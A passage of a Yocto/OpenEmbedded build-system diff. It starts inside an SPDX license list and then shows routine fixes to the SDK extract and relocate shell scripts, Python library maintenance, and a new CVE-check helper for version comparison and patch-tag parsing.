+ "http://sam.zoy.org/wtfpl/COPYING"
+ ],
+ "isOsiApproved": false,
+ "isFsfLibre": true
+ },
+ {
+ "reference": "https://spdx.org/licenses/OGL-UK-2.0.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/OGL-UK-2.0.json",
+ "referenceNumber": 458,
+ "name": "Open Government Licence v2.0",
+ "licenseId": "OGL-UK-2.0",
+ "seeAlso": [
+ "http://www.nationalarchives.gov.uk/doc/open-government-licence/version/2/"
+ ],
+ "isOsiApproved": false
+ },
+ {
+ "reference": "https://spdx.org/licenses/BSD-3-Clause-Attribution.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/BSD-3-Clause-Attribution.json",
+ "referenceNumber": 459,
+ "name": "BSD with attribution",
+ "licenseId": "BSD-3-Clause-Attribution",
+ "seeAlso": [
+ "https://fedoraproject.org/wiki/Licensing/BSD_with_Attribution"
+ ],
+ "isOsiApproved": false
+ },
+ {
+ "reference": "https://spdx.org/licenses/RPSL-1.0.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/RPSL-1.0.json",
+ "referenceNumber": 460,
+ "name": "RealNetworks Public Source License v1.0",
+ "licenseId": "RPSL-1.0",
+ "seeAlso": [
+ "https://helixcommunity.org/content/rpsl",
+ "https://opensource.org/licenses/RPSL-1.0"
+ ],
+ "isOsiApproved": true,
+ "isFsfLibre": true
+ },
+ {
+ "reference": "https://spdx.org/licenses/CC-BY-NC-ND-3.0-DE.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/CC-BY-NC-ND-3.0-DE.json",
+ "referenceNumber": 461,
+ "name": "Creative Commons Attribution Non Commercial No Derivatives 3.0 Germany",
+ "licenseId": "CC-BY-NC-ND-3.0-DE",
+ "seeAlso": [
+ "https://creativecommons.org/licenses/by-nc-nd/3.0/de/legalcode"
+ ],
+ "isOsiApproved": false
+ },
+ {
+ "reference": "https://spdx.org/licenses/EUPL-1.1.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/EUPL-1.1.json",
+ "referenceNumber": 462,
+ "name": "European Union Public License 1.1",
+ "licenseId": "EUPL-1.1",
+ "seeAlso": [
+ "https://joinup.ec.europa.eu/software/page/eupl/licence-eupl",
+ "https://joinup.ec.europa.eu/sites/default/files/custom-page/attachment/eupl1.1.-licence-en_0.pdf",
+ "https://opensource.org/licenses/EUPL-1.1"
+ ],
+ "isOsiApproved": true,
+ "isFsfLibre": true
+ },
+ {
+ "reference": "https://spdx.org/licenses/Sendmail-8.23.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/Sendmail-8.23.json",
+ "referenceNumber": 463,
+ "name": "Sendmail License 8.23",
+ "licenseId": "Sendmail-8.23",
+ "seeAlso": [
+ "https://www.proofpoint.com/sites/default/files/sendmail-license.pdf",
+ "https://web.archive.org/web/20181003101040/https://www.proofpoint.com/sites/default/files/sendmail-license.pdf"
+ ],
+ "isOsiApproved": false
+ },
+ {
+ "reference": "https://spdx.org/licenses/ODC-By-1.0.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/ODC-By-1.0.json",
+ "referenceNumber": 464,
+ "name": "Open Data Commons Attribution License v1.0",
+ "licenseId": "ODC-By-1.0",
+ "seeAlso": [
+ "https://opendatacommons.org/licenses/by/1.0/"
+ ],
+ "isOsiApproved": false
+ },
+ {
+ "reference": "https://spdx.org/licenses/D-FSL-1.0.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/D-FSL-1.0.json",
+ "referenceNumber": 465,
+ "name": "Deutsche Freie Software Lizenz",
+ "licenseId": "D-FSL-1.0",
+ "seeAlso": [
+ "http://www.dipp.nrw.de/d-fsl/lizenzen/",
+ "http://www.dipp.nrw.de/d-fsl/index_html/lizenzen/de/D-FSL-1_0_de.txt",
+ "http://www.dipp.nrw.de/d-fsl/index_html/lizenzen/en/D-FSL-1_0_en.txt",
+ "https://www.hbz-nrw.de/produkte/open-access/lizenzen/dfsl",
+ "https://www.hbz-nrw.de/produkte/open-access/lizenzen/dfsl/deutsche-freie-software-lizenz",
+ "https://www.hbz-nrw.de/produkte/open-access/lizenzen/dfsl/german-free-software-license",
+ "https://www.hbz-nrw.de/produkte/open-access/lizenzen/dfsl/D-FSL-1_0_de.txt/at_download/file",
+ "https://www.hbz-nrw.de/produkte/open-access/lizenzen/dfsl/D-FSL-1_0_en.txt/at_download/file"
+ ],
+ "isOsiApproved": false
+ },
+ {
+ "reference": "https://spdx.org/licenses/BSD-4-Clause.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/BSD-4-Clause.json",
+ "referenceNumber": 466,
+ "name": "BSD 4-Clause \"Original\" or \"Old\" License",
+ "licenseId": "BSD-4-Clause",
+ "seeAlso": [
+ "http://directory.fsf.org/wiki/License:BSD_4Clause"
+ ],
+ "isOsiApproved": false,
+ "isFsfLibre": true
+ },
+ {
+ "reference": "https://spdx.org/licenses/LGPL-2.1.html",
+ "isDeprecatedLicenseId": true,
+ "detailsUrl": "https://spdx.org/licenses/LGPL-2.1.json",
+ "referenceNumber": 467,
+ "name": "GNU Lesser General Public License v2.1 only",
+ "licenseId": "LGPL-2.1",
+ "seeAlso": [
+ "https://www.gnu.org/licenses/old-licenses/lgpl-2.1-standalone.html",
+ "https://opensource.org/licenses/LGPL-2.1"
+ ],
+ "isOsiApproved": true,
+ "isFsfLibre": true
+ },
+ {
+ "reference": "https://spdx.org/licenses/BSD-2-Clause-Views.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/BSD-2-Clause-Views.json",
+ "referenceNumber": 468,
+ "name": "BSD 2-Clause with views sentence",
+ "licenseId": "BSD-2-Clause-Views",
+ "seeAlso": [
+ "http://www.freebsd.org/copyright/freebsd-license.html",
+ "https://people.freebsd.org/~ivoras/wine/patch-wine-nvidia.sh",
+ "https://github.com/protegeproject/protege/blob/master/license.txt"
+ ],
+ "isOsiApproved": false
+ },
+ {
+ "reference": "https://spdx.org/licenses/Artistic-1.0-Perl.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/Artistic-1.0-Perl.json",
+ "referenceNumber": 469,
+ "name": "Artistic License 1.0 (Perl)",
+ "licenseId": "Artistic-1.0-Perl",
+ "seeAlso": [
+ "http://dev.perl.org/licenses/artistic.html"
+ ],
+ "isOsiApproved": true
+ },
+ {
+ "reference": "https://spdx.org/licenses/NPOSL-3.0.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/NPOSL-3.0.json",
+ "referenceNumber": 470,
+ "name": "Non-Profit Open Software License 3.0",
+ "licenseId": "NPOSL-3.0",
+ "seeAlso": [
+ "https://opensource.org/licenses/NOSL3.0"
+ ],
+ "isOsiApproved": true
+ },
+ {
+ "reference": "https://spdx.org/licenses/gSOAP-1.3b.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/gSOAP-1.3b.json",
+ "referenceNumber": 471,
+ "name": "gSOAP Public License v1.3b",
+ "licenseId": "gSOAP-1.3b",
+ "seeAlso": [
+ "http://www.cs.fsu.edu/~engelen/license.html"
+ ],
+ "isOsiApproved": false
+ },
+ {
+ "reference": "https://spdx.org/licenses/Interbase-1.0.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/Interbase-1.0.json",
+ "referenceNumber": 472,
+ "name": "Interbase Public License v1.0",
+ "licenseId": "Interbase-1.0",
+ "seeAlso": [
+ "https://web.archive.org/web/20060319014854/http://info.borland.com/devsupport/interbase/opensource/IPL.html"
+ ],
+ "isOsiApproved": false
+ },
+ {
+ "reference": "https://spdx.org/licenses/StandardML-NJ.html",
+ "isDeprecatedLicenseId": true,
+ "detailsUrl": "https://spdx.org/licenses/StandardML-NJ.json",
+ "referenceNumber": 473,
+ "name": "Standard ML of New Jersey License",
+ "licenseId": "StandardML-NJ",
+ "seeAlso": [
+ "http://www.smlnj.org//license.html"
+ ],
+ "isOsiApproved": false
+ }
+ ],
+ "releaseDate": "2021-08-08"
+} \ No newline at end of file
diff --git a/meta/files/toolchain-shar-extract.sh b/meta/files/toolchain-shar-extract.sh
index bea6d4189a..4386b985bb 100644
--- a/meta/files/toolchain-shar-extract.sh
+++ b/meta/files/toolchain-shar-extract.sh
@@ -56,7 +56,8 @@ if ! xz -V > /dev/null 2>&1; then
exit 1
fi
-DEFAULT_INSTALL_DIR="@SDKPATH@"
+SDK_BUILD_PATH="@SDKPATH@"
+DEFAULT_INSTALL_DIR="@SDKPATHINSTALL@"
SUDO_EXEC=""
EXTRA_TAR_OPTIONS=""
target_sdk_dir=""
@@ -95,7 +96,7 @@ while getopts ":yd:npDRSl" OPT; do
listcontents=1
;;
*)
- echo "Usage: $(basename $0) [-y] [-d <dir>]"
+ echo "Usage: $(basename "$0") [-y] [-d <dir>]"
echo " -y Automatic yes to all prompts"
echo " -d <dir> Install the SDK to <dir>"
echo "======== Extensible SDK only options ============"
@@ -111,17 +112,17 @@ while getopts ":yd:npDRSl" OPT; do
esac
done
-payload_offset=$(($(grep -na -m1 "^MARKER:$" $0|cut -d':' -f1) + 1))
+payload_offset=$(($(grep -na -m1 "^MARKER:$" "$0"|cut -d':' -f1) + 1))
if [ "$listcontents" = "1" ] ; then
if [ @SDK_ARCHIVE_TYPE@ = "zip" ]; then
- tail -n +$payload_offset $0 > sdk.zip
+ tail -n +$payload_offset "$0" > sdk.zip
if unzip -l sdk.zip;then
rm sdk.zip
else
rm sdk.zip && exit 1
fi
else
- tail -n +$payload_offset $0| tar tvJ || exit 1
+ tail -n +$payload_offset "$0"| tar tvJ || exit 1
fi
exit
fi
@@ -242,14 +243,14 @@ fi
printf "Extracting SDK..."
if [ @SDK_ARCHIVE_TYPE@ = "zip" ]; then
- tail -n +$payload_offset $0 > sdk.zip
+ tail -n +$payload_offset "$0" > sdk.zip
if $SUDO_EXEC unzip $EXTRA_TAR_OPTIONS sdk.zip -d $target_sdk_dir;then
rm sdk.zip
else
rm sdk.zip && exit 1
fi
else
- tail -n +$payload_offset $0| $SUDO_EXEC tar mxJ -C $target_sdk_dir --checkpoint=.2500 $EXTRA_TAR_OPTIONS || exit 1
+ tail -n +$payload_offset "$0"| $SUDO_EXEC tar mxJ -C $target_sdk_dir --checkpoint=.2500 $EXTRA_TAR_OPTIONS || exit 1
fi
echo "done"
diff --git a/meta/files/toolchain-shar-relocate.sh b/meta/files/toolchain-shar-relocate.sh
index e3c10018ef..cee9adbf39 100644
--- a/meta/files/toolchain-shar-relocate.sh
+++ b/meta/files/toolchain-shar-relocate.sh
@@ -5,7 +5,7 @@ fi
# fix dynamic loader paths in all ELF SDK binaries
native_sysroot=$($SUDO_EXEC cat $env_setup_script |grep 'OECORE_NATIVE_SYSROOT='|cut -d'=' -f2|tr -d '"')
-dl_path=$($SUDO_EXEC find $native_sysroot/lib -name "ld-linux*")
+dl_path=$($SUDO_EXEC find $native_sysroot/lib -maxdepth 1 -name "ld-linux*")
if [ "$dl_path" = "" ] ; then
echo "SDK could not be set up. Relocate script unable to find ld-linux.so. Abort!"
exit 1
@@ -55,10 +55,13 @@ fi
for replace in "$target_sdk_dir -maxdepth 1" "$native_sysroot"; do
$SUDO_EXEC find $replace -type f
done | xargs -n100 file | grep ":.*\(ASCII\|script\|source\).*text" | \
- awk -F':' '{printf "\"%s\"\n", $1}' | \
- grep -Ev "$target_sdk_dir/(environment-setup-*|relocate_sdk*|${0##*/})" | \
+ awk -F': ' '{printf "\"%s\"\n", $1}' | \
+ grep -Fv -e "$target_sdk_dir/environment-setup-" \
+ -e "$target_sdk_dir/relocate_sdk" \
+ -e "$target_sdk_dir/post-relocate-setup" \
+ -e "$target_sdk_dir/${0##*/}" | \
xargs -n100 $SUDO_EXEC sed -i \
- -e "s:$DEFAULT_INSTALL_DIR:$target_sdk_dir:g" \
+ -e "s:$SDK_BUILD_PATH:$target_sdk_dir:g" \
-e "s:^#! */usr/bin/perl.*:#! /usr/bin/env perl:g" \
-e "s: /usr/bin/perl: /usr/bin/env perl:g"
@@ -69,7 +72,7 @@ fi
# change all symlinks pointing to @SDKPATH@
for l in $($SUDO_EXEC find $native_sysroot -type l); do
- $SUDO_EXEC ln -sfn $(readlink $l|$SUDO_EXEC sed -e "s:$DEFAULT_INSTALL_DIR:$target_sdk_dir:") $l
+ $SUDO_EXEC ln -sfn $(readlink $l|$SUDO_EXEC sed -e "s:$SDK_BUILD_PATH:$target_sdk_dir:") $l
if [ $? -ne 0 ]; then
echo "Failed to setup symlinks. Relocate script failed. Abort!"
exit 1
diff --git a/meta/lib/bblayers/create.py b/meta/lib/bblayers/create.py
index 542f31fc81..f49b48d1b4 100644
--- a/meta/lib/bblayers/create.py
+++ b/meta/lib/bblayers/create.py
@@ -71,7 +71,7 @@ class CreatePlugin(LayerPlugin):
def register_commands(self, sp):
parser_create_layer = self.add_command(sp, 'create-layer', self.do_create_layer, parserecipes=False)
parser_create_layer.add_argument('layerdir', help='Layer directory to create')
- parser_create_layer.add_argument('--priority', '-p', default=6, help='Layer directory to create')
+ parser_create_layer.add_argument('--priority', '-p', default=6, help='Priority of recipes in layer')
parser_create_layer.add_argument('--example-recipe-name', '-e', dest='examplerecipe', default='example', help='Filename of the example recipe')
parser_create_layer.add_argument('--example-recipe-version', '-v', dest='version', default='0.1', help='Version number for the example recipe')
diff --git a/meta/lib/buildstats.py b/meta/lib/buildstats.py
index 8627ed3c31..c52b6c3b72 100644
--- a/meta/lib/buildstats.py
+++ b/meta/lib/buildstats.py
@@ -43,8 +43,8 @@ class SystemStats:
# depends on the heartbeat event, which fires less often.
self.min_seconds = 1
- self.meminfo_regex = re.compile(b'^(MemTotal|MemFree|Buffers|Cached|SwapTotal|SwapFree):\s*(\d+)')
- self.diskstats_regex = re.compile(b'^([hsv]d.|mtdblock\d|mmcblk\d|cciss/c\d+d\d+.*)$')
+ self.meminfo_regex = re.compile(rb'^(MemTotal|MemFree|Buffers|Cached|SwapTotal|SwapFree):\s*(\d+)')
+ self.diskstats_regex = re.compile(rb'^([hsv]d.|mtdblock\d|mmcblk\d|cciss/c\d+d\d+.*)$')
self.diskstats_ltime = None
self.diskstats_data = None
self.stat_ltimes = None
diff --git a/meta/lib/oe/copy_buildsystem.py b/meta/lib/oe/copy_buildsystem.py
index 31a84f5b06..d97bf9d1b9 100644
--- a/meta/lib/oe/copy_buildsystem.py
+++ b/meta/lib/oe/copy_buildsystem.py
@@ -20,7 +20,7 @@ def _smart_copy(src, dest):
mode = os.stat(src).st_mode
if stat.S_ISDIR(mode):
bb.utils.mkdirhier(dest)
- cmd = "tar --exclude='.git' --xattrs --xattrs-include='*' -chf - -C %s -p . \
+ cmd = "tar --exclude='.git' --exclude='__pycache__' --xattrs --xattrs-include='*' -chf - -C %s -p . \
| tar --xattrs --xattrs-include='*' -xf - -C %s" % (src, dest)
subprocess.check_output(cmd, shell=True, stderr=subprocess.STDOUT)
else:
@@ -259,7 +259,7 @@ def create_locked_sstate_cache(lockedsigs, input_sstate_cache, output_sstate_cac
bb.note('Generating sstate-cache...')
nativelsbstring = d.getVar('NATIVELSBSTRING')
- bb.process.run("gen-lockedsig-cache %s %s %s %s %s" % (lockedsigs, input_sstate_cache, output_sstate_cache, nativelsbstring, filterfile or ''))
+ bb.process.run("PYTHONDONTWRITEBYTECODE=1 gen-lockedsig-cache %s %s %s %s %s" % (lockedsigs, input_sstate_cache, output_sstate_cache, nativelsbstring, filterfile or ''))
if fixedlsbstring and nativelsbstring != fixedlsbstring:
nativedir = output_sstate_cache + '/' + nativelsbstring
if os.path.isdir(nativedir):
@@ -286,7 +286,7 @@ def check_sstate_task_list(d, targets, filteroutfile, cmdprefix='', cwd=None, lo
logparam = '-l %s' % logfile
else:
logparam = ''
- cmd = "%sBB_SETSCENE_ENFORCE=1 PSEUDO_DISABLED=1 oe-check-sstate %s -s -o %s %s" % (cmdprefix, targets, filteroutfile, logparam)
+ cmd = "%sPYTHONDONTWRITEBYTECODE=1 BB_SETSCENE_ENFORCE=1 PSEUDO_DISABLED=1 oe-check-sstate %s -s -o %s %s" % (cmdprefix, targets, filteroutfile, logparam)
env = dict(d.getVar('BB_ORIGENV', False))
env.pop('BUILDDIR', '')
env.pop('BBPATH', '')
diff --git a/meta/lib/oe/cve_check.py b/meta/lib/oe/cve_check.py
new file mode 100644
index 0000000000..ed4af18ced
--- /dev/null
+++ b/meta/lib/oe/cve_check.py
@@ -0,0 +1,212 @@
+import collections
+import re
+import itertools
+import functools
+
+_Version = collections.namedtuple(
+ "_Version", ["release", "patch_l", "pre_l", "pre_v"]
+)
+
+@functools.total_ordering
+class Version():
+
+ def __init__(self, version, suffix=None):
+
+ suffixes = ["alphabetical", "patch"]
+
+ if str(suffix) == "alphabetical":
+ version_pattern = r"""r?v?(?:(?P<release>[0-9]+(?:[-\.][0-9]+)*)(?P<patch>[-_\.]?(?P<patch_l>[a-z]))?(?P<pre>[-_\.]?(?P<pre_l>(rc|alpha|beta|pre|preview|dev))[-_\.]?(?P<pre_v>[0-9]+)?)?)(.*)?"""
+ elif str(suffix) == "patch":
+ version_pattern = r"""r?v?(?:(?P<release>[0-9]+(?:[-\.][0-9]+)*)(?P<patch>[-_\.]?(p|patch)(?P<patch_l>[0-9]+))?(?P<pre>[-_\.]?(?P<pre_l>(rc|alpha|beta|pre|preview|dev))[-_\.]?(?P<pre_v>[0-9]+)?)?)(.*)?"""
+ else:
+ version_pattern = r"""r?v?(?:(?P<release>[0-9]+(?:[-\.][0-9]+)*)(?P<pre>[-_\.]?(?P<pre_l>(rc|alpha|beta|pre|preview|dev))[-_\.]?(?P<pre_v>[0-9]+)?)?)(.*)?"""
+ regex = re.compile(r"^\s*" + version_pattern + r"\s*$", re.VERBOSE | re.IGNORECASE)
+
+ match = regex.search(version)
+ if not match:
+ raise Exception("Invalid version: '{0}'".format(version))
+
+ self._version = _Version(
+ release=tuple(int(i) for i in match.group("release").replace("-",".").split(".")),
+ patch_l=match.group("patch_l") if str(suffix) in suffixes and match.group("patch_l") else "",
+ pre_l=match.group("pre_l"),
+ pre_v=match.group("pre_v")
+ )
+
+ self._key = _cmpkey(
+ self._version.release,
+ self._version.patch_l,
+ self._version.pre_l,
+ self._version.pre_v
+ )
+
+ def __eq__(self, other):
+ if not isinstance(other, Version):
+ return NotImplemented
+ return self._key == other._key
+
+ def __gt__(self, other):
+ if not isinstance(other, Version):
+ return NotImplemented
+ return self._key > other._key
+
+def _cmpkey(release, patch_l, pre_l, pre_v):
+ # remove leading 0
+ _release = tuple(
+ reversed(list(itertools.dropwhile(lambda x: x == 0, reversed(release))))
+ )
+
+ _patch = patch_l.upper()
+
+ if pre_l is None and pre_v is None:
+ _pre = float('inf')
+ else:
+ _pre = float(pre_v) if pre_v else float('-inf')
+ return _release, _patch, _pre
+
+def cve_check_merge_jsons(output, data):
+ """
+ Merge the data in the "package" property to the main data file
+ output
+ """
+ if output["version"] != data["version"]:
+ bb.error("Version mismatch when merging JSON outputs")
+ return
+
+ for product in output["package"]:
+ if product["name"] == data["package"][0]["name"]:
+ bb.error("Error adding the same package %s twice" % product["name"])
+ return
+
+ output["package"].append(data["package"][0])
+
+def update_symlinks(target_path, link_path):
+ """
+ Update a symbolic link link_path to point to target_path.
+ Remove the link and recreate it if exist and is different.
+ """
+ if link_path != target_path and os.path.exists(target_path):
+ if os.path.exists(os.path.realpath(link_path)):
+ os.remove(link_path)
+ os.symlink(os.path.basename(target_path), link_path)
+
+def get_patched_cves(d):
+ """
+ Get patches that solve CVEs using the "CVE: " tag.
+ """
+
+ import re
+ import oe.patch
+
+ pn = d.getVar("PN")
+ cve_match = re.compile("CVE:( CVE\-\d{4}\-\d+)+")
+
+ # Matches the last "CVE-YYYY-ID" in the file name, also if written
+ # in lowercase. Possible to have multiple CVE IDs in a single
+ # file name, but only the last one will be detected from the file name.
+ # However, patch files contents addressing multiple CVE IDs are supported
+ # (cve_match regular expression)
+
+ cve_file_name_match = re.compile(".*([Cc][Vv][Ee]\-\d{4}\-\d+)")
+
+ patched_cves = set()
+ bb.debug(2, "Looking for patches that solves CVEs for %s" % pn)
+ for url in oe.patch.src_patches(d):
+ patch_file = bb.fetch.decodeurl(url)[2]
+
+ # Check patch file name for CVE ID
+ fname_match = cve_file_name_match.search(patch_file)
+ if fname_match:
+ cve = fname_match.group(1).upper()
+ patched_cves.add(cve)
+ bb.debug(2, "Found CVE %s from patch file name %s" % (cve, patch_file))
+
+ # Remote patches won't be present and compressed patches won't be
+ # unpacked, so say we're not scanning them
+ if not os.path.isfile(patch_file):
+ bb.note("%s is remote or compressed, not scanning content" % patch_file)
+ continue
+
+ with open(patch_file, "r", encoding="utf-8") as f:
+ try:
+ patch_text = f.read()
+ except UnicodeDecodeError:
+ bb.debug(1, "Failed to read patch %s using UTF-8 encoding"
+ " trying with iso8859-1" % patch_file)
+ f.close()
+ with open(patch_file, "r", encoding="iso8859-1") as f:
+ patch_text = f.read()
+
+ # Search for one or more "CVE: " lines
+ text_match = False
+ for match in cve_match.finditer(patch_text):
+ # Get only the CVEs without the "CVE: " tag
+ cves = patch_text[match.start()+5:match.end()]
+ for cve in cves.split():
+ bb.debug(2, "Patch %s solves %s" % (patch_file, cve))
+ patched_cves.add(cve)
+ text_match = True
+
+ if not fname_match and not text_match:
+ bb.debug(2, "Patch %s doesn't solve CVEs" % patch_file)
+
+ return patched_cves
+
+
+def get_cpe_ids(cve_product, version):
+ """
+ Get list of CPE identifiers for the given product and version
+ """
+
+ version = version.split("+git")[0]
+
+ cpe_ids = []
+ for product in cve_product.split():
+ # CVE_PRODUCT in recipes may include vendor information for CPE identifiers. If not,
+ # use wildcard for vendor.
+ if ":" in product:
+ vendor, product = product.split(":", 1)
+ else:
+ vendor = "*"
+
+ cpe_id = 'cpe:2.3:a:{}:{}:{}:*:*:*:*:*:*:*'.format(vendor, product, version)
+ cpe_ids.append(cpe_id)
+
+ return cpe_ids
+
+def convert_cve_version(version):
+ """
+ This function converts from CVE format to Yocto version format.
+ eg 8.3_p1 -> 8.3p1, 6.2_rc1 -> 6.2-rc1
+
+ Unless it is redefined using CVE_VERSION in the recipe,
+ cve_check uses the version in the name of the recipe (${PV})
+ to check vulnerabilities against a CVE in the database downloaded from NVD.
+
+ When the version has an update, i.e.
+ "p1" in OpenSSH 8.3p1,
+ "-rc1" in linux kernel 6.2-rc1,
+ the database stores the version as version_update (8.3_p1, 6.2_rc1).
+ Therefore, we must transform this version before comparing to the
+ recipe version.
+
+ In this case, the parameter of the function is 8.3_p1.
+ If the version uses the Release Candidate format, "rc",
+ this function replaces the '_' by '-'.
+ If the version uses the Update format, "p",
+ this function removes the '_' completely.
+ """
+ import re
+
+ matches = re.match('^([0-9.]+)_((p|rc)[0-9]+)$', version)
+
+ if not matches:
+ return version
+
+ version = matches.group(1)
+ update = matches.group(2)
+
+ if matches.group(3) == "rc":
+ return version + '-' + update
+
+ return version + update
diff --git a/meta/lib/oe/gpg_sign.py b/meta/lib/oe/gpg_sign.py
index 7634d7ef1d..492f096eaa 100644
--- a/meta/lib/oe/gpg_sign.py
+++ b/meta/lib/oe/gpg_sign.py
@@ -111,7 +111,7 @@ class LocalSigner(object):
def verify(self, sig_file):
"""Verify signature"""
- cmd = self.gpg_cmd + [" --verify", "--no-permission-warning"]
+ cmd = self.gpg_cmd + ["--verify", "--no-permission-warning"]
if self.gpg_path:
cmd += ["--homedir", self.gpg_path]
diff --git a/meta/lib/oe/license.py b/meta/lib/oe/license.py
index c1274a61de..c4efbe142b 100644
--- a/meta/lib/oe/license.py
+++ b/meta/lib/oe/license.py
@@ -81,6 +81,9 @@ class FlattenVisitor(LicenseVisitor):
def visit_Str(self, node):
self.licenses.append(node.s)
+ def visit_Constant(self, node):
+ self.licenses.append(node.value)
+
def visit_BinOp(self, node):
if isinstance(node.op, ast.BitOr):
left = FlattenVisitor(self.choose_licenses)
@@ -234,6 +237,9 @@ class ListVisitor(LicenseVisitor):
def visit_Str(self, node):
self.licenses.add(node.s)
+ def visit_Constant(self, node):
+ self.licenses.add(node.value)
+
def list_licenses(licensestr):
"""Simply get a list of all licenses mentioned in a license string.
Binary operators are not applied or taken into account in any way"""
diff --git a/meta/lib/oe/package_manager.py b/meta/lib/oe/package_manager.py
index b0660411ea..502dfbe3ed 100644
--- a/meta/lib/oe/package_manager.py
+++ b/meta/lib/oe/package_manager.py
@@ -403,7 +403,7 @@ class PackageManager(object, metaclass=ABCMeta):
bb.utils.remove(self.intercepts_dir, True)
bb.utils.mkdirhier(self.intercepts_dir)
for intercept in postinst_intercepts:
- bb.utils.copyfile(intercept, os.path.join(self.intercepts_dir, os.path.basename(intercept)))
+ shutil.copy(intercept, os.path.join(self.intercepts_dir, os.path.basename(intercept)))
@abstractmethod
def _handle_intercept_failure(self, failed_script):
@@ -611,12 +611,13 @@ class PackageManager(object, metaclass=ABCMeta):
"'%s' returned %d:\n%s" %
(' '.join(cmd), e.returncode, e.output.decode("utf-8")))
- target_arch = self.d.getVar('TARGET_ARCH')
- localedir = oe.path.join(self.target_rootfs, self.d.getVar("libdir"), "locale")
- if os.path.exists(localedir) and os.listdir(localedir):
- generate_locale_archive(self.d, self.target_rootfs, target_arch, localedir)
- # And now delete the binary locales
- self.remove(fnmatch.filter(self.list_installed(), "glibc-binary-localedata-*"), False)
+ if self.d.getVar('IMAGE_LOCALES_ARCHIVE') == '1':
+ target_arch = self.d.getVar('TARGET_ARCH')
+ localedir = oe.path.join(self.target_rootfs, self.d.getVar("libdir"), "locale")
+ if os.path.exists(localedir) and os.listdir(localedir):
+ generate_locale_archive(self.d, self.target_rootfs, target_arch, localedir)
+ # And now delete the binary locales
+ self.remove(fnmatch.filter(self.list_installed(), "glibc-binary-localedata-*"), False)
def deploy_dir_lock(self):
if self.deploy_dir is None:
diff --git a/meta/lib/oe/packagedata.py b/meta/lib/oe/packagedata.py
index a82085a792..feb834c0e3 100644
--- a/meta/lib/oe/packagedata.py
+++ b/meta/lib/oe/packagedata.py
@@ -57,6 +57,17 @@ def read_subpkgdata_dict(pkg, d):
ret[newvar] = subd[var]
return ret
+def read_subpkgdata_extended(pkg, d):
+ import json
+ import gzip
+
+ fn = d.expand("${PKGDATA_DIR}/extended/%s.json.gz" % pkg)
+ try:
+ with gzip.open(fn, "rt", encoding="utf-8") as f:
+ return json.load(f)
+ except FileNotFoundError:
+ return None
+
def _pkgmap(d):
"""Return a dictionary mapping package to recipe name."""
diff --git a/meta/lib/oe/patch.py b/meta/lib/oe/patch.py
index 7ca2e28b1f..feb6ee7082 100644
--- a/meta/lib/oe/patch.py
+++ b/meta/lib/oe/patch.py
@@ -2,6 +2,9 @@
# SPDX-License-Identifier: GPL-2.0-only
#
+import os
+import shlex
+import subprocess
import oe.path
import oe.types
@@ -24,7 +27,6 @@ class CmdError(bb.BBHandledException):
def runcmd(args, dir = None):
- import pipes
import subprocess
if dir:
@@ -35,7 +37,7 @@ def runcmd(args, dir = None):
# print("cwd: %s -> %s" % (olddir, dir))
try:
- args = [ pipes.quote(str(arg)) for arg in args ]
+ args = [ shlex.quote(str(arg)) for arg in args ]
cmd = " ".join(args)
# print("cmd: %s" % cmd)
(exitstatus, output) = subprocess.getstatusoutput(cmd)
@@ -512,7 +514,7 @@ class GitApplyTree(PatchTree):
try:
shellcmd = [patchfilevar, "git", "--work-tree=%s" % reporoot]
self.gitCommandUserOptions(shellcmd, self.commituser, self.commitemail)
- shellcmd += ["am", "-3", "--keep-cr", "-p%s" % patch['strippath']]
+ shellcmd += ["am", "-3", "--keep-cr", "--no-scissors", "-p%s" % patch['strippath']]
return _applypatchhelper(shellcmd, patch, force, reverse, run)
except CmdError:
# Need to abort the git am, or we'll still be within it at the end
diff --git a/meta/lib/oe/path.py b/meta/lib/oe/path.py
index 082972457b..c8d8ad05b9 100644
--- a/meta/lib/oe/path.py
+++ b/meta/lib/oe/path.py
@@ -320,3 +320,24 @@ def which_wild(pathname, path=None, mode=os.F_OK, *, reverse=False, candidates=F
return files
+def canonicalize(paths, sep=','):
+ """Given a string with paths (separated by commas by default), expand
+ each path using os.path.realpath() and return the resulting paths as a
+ string (separated using the same separator a the original string).
+ """
+ # Ignore paths containing "$" as they are assumed to be unexpanded bitbake
+ # variables. Normally they would be ignored, e.g., when passing the paths
+ # through the shell they would expand to empty strings. However, when they
+ # are passed through os.path.realpath(), it will cause them to be prefixed
+ # with the absolute path to the current directory and thus not be empty
+ # anymore.
+ #
+ # Also maintain trailing slashes, as the paths may actually be used as
+ # prefixes in sting compares later on, where the slashes then are important.
+ canonical_paths = []
+ for path in (paths or '').split(sep):
+ if '$' not in path:
+ trailing_slash = path.endswith('/') and '/' or ''
+ canonical_paths.append(os.path.realpath(path) + trailing_slash)
+
+ return sep.join(canonical_paths)
diff --git a/meta/lib/oe/prservice.py b/meta/lib/oe/prservice.py
index 2d3c9c7e50..fcdbe66c19 100644
--- a/meta/lib/oe/prservice.py
+++ b/meta/lib/oe/prservice.py
@@ -3,10 +3,6 @@
#
def prserv_make_conn(d, check = False):
- # Otherwise this fails when called from recipes which e.g. inherit python3native (which sets _PYTHON_SYSCONFIGDATA_NAME) with:
- # No module named '_sysconfigdata'
- if '_PYTHON_SYSCONFIGDATA_NAME' in os.environ:
- del os.environ['_PYTHON_SYSCONFIGDATA_NAME']
import prserv.serv
host_params = list([_f for _f in (d.getVar("PRSERV_HOST") or '').split(':') if _f])
try:
